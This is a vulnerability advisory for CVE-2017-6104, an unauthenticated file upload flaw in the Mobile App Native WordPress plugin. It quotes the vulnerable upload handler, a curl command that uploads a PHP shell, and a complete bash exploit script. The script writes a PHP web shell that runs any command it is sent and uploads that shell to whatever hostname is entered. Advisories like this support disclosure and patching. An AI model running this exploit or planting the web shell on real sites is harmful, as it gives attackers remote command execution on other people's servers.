./ zen-mobile-app-native/server/images.php code for missing authentication
Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in the file
./ zen-mobile-app-native/server/images.php doesn’t require authentication or check that the user is allowed to upload content. It also doesn’t sanitize the file upload against executable code. `` <? php //header(‘content-type: text/html; charset=iso-8859-2’); header(‘Content-Type: text/html; charset=utf-8’); header(‘Access-Control-Allow-Origin: *’); require_once(‘function.php’);
if ($_FILES['file']['name']) {
if (!$ _FILES['file']['error']) {
$name = md5(rand(100, 200));
$ext = explode('.', $_FILES['file']['name']);
$filename = $name . '.' . $ext[1];
$destination = 'images/' . $filename;
$location = $_FILES["file"]["tmp_name"];
move_uploaded_file($location, $destination);
echo $plugin_url.'/ server/images/' . $filename;
}
else {
echo $message = 'Ooops! Your upload triggered the following error: '.$ _FILES['file']['error'];
}
}
``
CVEIDs: CVE-2017-6104 Trojan: $ curl-F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"; http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php
https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh
#!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0
cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
echo "<pre>";
\$cmd = (\$_REQUEST[‘cmd’]);
system(\$cmd);
echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-
red='\033[0;31m'
NC='\033[0m' # No Color
while [ true ]; do
echo -e ${red};
echo -e " Mobile App Native 3.0 File Upload PoC Redux $NC";
echo " 3/1/2017";
echo " Larry W. Cashdollar, @_larry0";
echo
echo " CVE-2017-6104";
echo "- Advisory -";
echo "http://www.vapid.dhs.org/advisory.php?v=178";
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo "[+] Hostname $target";
echo "[+] Exploiting Plugin";
echo
RESULT=`curl -# -F '[email protected]' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
echo "[==========================================================================]"
echo $RESULT
echo "[==========================================================================]"
done